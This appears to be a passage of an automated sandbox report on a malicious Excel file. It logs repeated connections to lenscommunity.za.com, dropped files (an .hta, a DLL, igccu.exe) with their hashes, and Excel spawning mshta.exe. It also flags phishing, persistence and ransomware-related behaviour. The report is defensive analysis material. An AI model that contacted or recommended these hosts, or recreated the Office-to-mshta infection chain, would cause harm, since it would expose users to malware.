SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp

Files

memory/2164-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2164-1-0x00000000722FD000-0x0000000072308000-memory.dmp

memory/2588-21-0x00000000022E0000-0x00000000022E2000-memory.dmp

memory/2164-22-0x0000000002DF0000-0x0000000002DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\Ciguy[1].htm

MD5 0104c301c5e02bd6148b8703d19b3a73
SHA1 7436e0b4b1f8c222c38069890b75fa2baf9ca620
SHA256 446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f
SHA512 84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\R5VDZM2I.txt

MD5 e944c16d233c378e20f88aaca4c4b2bc
SHA1 3880b1af920e8f54d47efcf6b20f8de6a9b0eb91
SHA256 651714f707d7b13e9f837c45a13410ab606214d851043dc30be513eabc99895f
SHA512 26df28002061404d6fb8a68185bae217c287bf1cc6988a10da9dc97fab5f831e4317c22aa37ba7c774194b43fd254a130d3be529164d810af0aa5ae264c9246b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 e0a64fff2279f78a54e21a1d5cf55fab
SHA1 37fe5a4c0817b298c2c1e6dccd71bd810e810b2b
SHA256 4ac4f6934cfc40f8f60c76c60bd1062da6830ddbbe0b66cf319ac160b7ce6986
SHA512 de14cf54fa90223a90af62434b8f7b08f83855fa2a46dd3acc0bc1246127d6f76e3a521ceed1830dda0ed17e5569421337df5d4bf93ac4803753ca9985612dfc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6231a7e335ac0c5675b4d9e53cba3a7c
SHA1 ba46a30aa9a6836c6991224de2731ad69074754e
SHA256 6bb4d89d4989f4264cf1c343698837773b50d4b0963c39c97337747090985705
SHA512 78ab9a108eec356b57c7957849d911ca2794ece3d7025dc9012e16a06d03a3f5fa16a05dae0144e8f07e85567db61225d840181e5a8ccc043d25f0ad681927f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 405afdf945da6eea73625fd7773a899c
SHA1 a3b2379e9a89d74ff8b552cc6ba10bf591c5490a
SHA256 cedb29414c8ee507ee13054f51bb491547306c351ae410b790810eb7f67e4295
SHA512 81460aa2d344ab181755fab820fd359c0c8dca83efef034f8d7141964a1ed65654ae34caf727a10f582bc48d6b3a26448f57787fc9faec0a9ff46ece10d72c7d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 344026bfcbbd31de65311697e93de53e
SHA1 5837d8019fa947cda639841a949e101719056919
SHA256 eaa17f89a999eabc3d9cb341b4dc05facbe264d4b72841fb17000bb7e475627a
SHA512 e803a17d58b5c5a42628410b5535898786ee7c4cf51040ac521f5b5efe81d727071d943e4cae5b18624026f0f91553cf7533d82a6678dcaa8f7e8c30aee9861d

C:\Users\Admin\AppData\Local\Temp\Cab197A.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\alz[1].hta

MD5 cf573287d1845d0c33aba5af99121331
SHA1 5338c9ef25f8aaecaaf48db274efdd048987c66c
SHA256 dface533aae3c418c2ff081471b5362fc2bbad4ad7fe99180b0f0be880ddd60d
SHA512 66e513984de433000c25f59cba3c426241ac6deac1079b7e5ece61c59ae80ed5dd5bcd3866059b1074b9ae61f535c24ae181f966484e4d8ea3526ac0509cf48f

\??\c:\Users\Admin\AppData\Local\Temp\irmotvw4.cmdline

MD5 e770c580ebc9a1340731c9b18ba429a1
SHA1 5763d606e1e30a2343926413b935884b1924f4de
SHA256 add5b3412f39506a63bd1fa482cdf7536481597f970d671ea48b4cced94380c2
SHA512 cbb7c06f377a2af9354298b25a556cda8067aa85fd5f8c48e20164c218cb26eac5bbfb8f0cc2a4892260caeb17a886520254a9027aaf9dc45ac07095637f325f

\??\c:\Users\Admin\AppData\Local\Temp\irmotvw4.0.cs

MD5 4baee22b8aa20472316e9ea4bdb51bc6
SHA1 e2ebe036e53eb17cad6e8941e7688884aa571e5a
SHA256 50a004d5479bbbf5c9f8fe7e2eb511e4142910e1efc5ad8c20b2ff91e691a1c3
SHA512 9b1b2c88d1c843af8e6730a5a15975ddb4c8442c16d2645e07c52e67d4cd2728d9fe6bc3dd16c6e4df0f6882ca12ae717a580a4bbe69da62bfc184c97b2691d9

\??\c:\Users\Admin\AppData\Local\Temp\CSC20D9.tmp

MD5 06605119ad7d2a6c8da20e4f57036af9
SHA1 31cb9679b27672d5bba786a327066d07cbc226c0
SHA256 4fc9dcb3cee54a667830f4990ac81a77736cc44e993349c5d548748cd19c3fd5
SHA512 cebf0f8cac4b45dae82733753b093e60e4667ee4c156d2bab6e4e167e77a3a8a025294870752abdbe6cad488e71add02efe5256f9fdd1980c750c021190b327a

C:\Users\Admin\AppData\Local\Temp\RES20DA.tmp

MD5 05bbe8bfe2f2533f0bbd5bb3f4b79124
SHA1 9ed298d34b84200054df25b0260dd03cb962f690
SHA256 ab1c35092bfe116a245992e1e1277aaad164cd7429c87d0fce9e529324344978
SHA512 db85016379fa4c461baf03d1a661a207868480e054b5ad818f5f7ac3e546bd85dea132f08cc3f507b3767ee88a67cb02796d487a1e25b560a79eed3b1d124925

C:\Users\Admin\AppData\Local\Temp\irmotvw4.dll

MD5 bcff9e90424961d1ec5738595bc45d89
SHA1 cf56cace661c6844a320a1ef4cb51127df7acc53
SHA256 88b97275c7d7d51f278bb9da81e20d3e54377b2d94983f25978c3e00fffcbbb1
SHA512 4b12ad5a12012c6364a1ce1f3a6c0a166b58a3d40da836eb409701358f8baf62b07169e19334c03b5d35de8e4274702f80daeb3c0fa7321cd8573e3686be0377

C:\Users\Admin\AppData\Local\Temp\irmotvw4.pdb

MD5 716882f5fbe77872551419c7fe1b433b
SHA1 fd2496cedc63110bef11204b410b0270bf44a425
SHA256 c0891414a1d07578719c433beb261aaf2434e0398b64d8b0e78a8ac5cdef879d
SHA512 662df3134fcd68243ded91738a1ab66fded1961e258f6156b1c0daadcaf2eb5104dd2f875ac868ff3ba3db762c246cdd4c24615d5f9914b5014d2e2ee713e666

\Users\Admin\AppData\Roaming\igccu.exe

MD5 3803a58f9512197b7242462789defc41
SHA1 747d8969e43395649d765d55a3f9fa4fe492bd21
SHA256 f10ea3e1160e4966e71b49dc53997d122b999f57e398ed5578bd20fbf8254bfd
SHA512 5923a7670e36ab65a58b6b767ebed5b5bd4b38442c434c385311af62a2b4a00d3c7293f208dac1ed06430e1d5ce6968c2a6680bef8cae468c3110f40e7ce5df5

memory/1808-71-0x0000000000880000-0x000000000088C000-memory.dmp

memory/2164-72-0x00000000722FD000-0x0000000072308000-memory.dmp

memory/2164-74-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2164-77-0x00000000722FD000-0x0000000072308000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-27 01:10

Reported

2024-06-27 01:12

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3544 wrote to memory of 2828 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 3544 wrote to memory of 2828 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 lnkz.at udp
US 172.67.180.182:80 lnkz.at tcp
US 172.67.180.182:443 lnkz.at tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 182.180.67.172.in-addr.arpa udp
US 172.245.135.155:80 172.245.135.155 tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 155.135.245.172.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
